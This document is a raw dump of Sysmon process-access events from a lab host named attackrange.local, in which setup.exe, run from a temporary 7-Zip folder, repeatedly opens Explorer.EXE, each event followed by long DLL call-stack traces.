\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 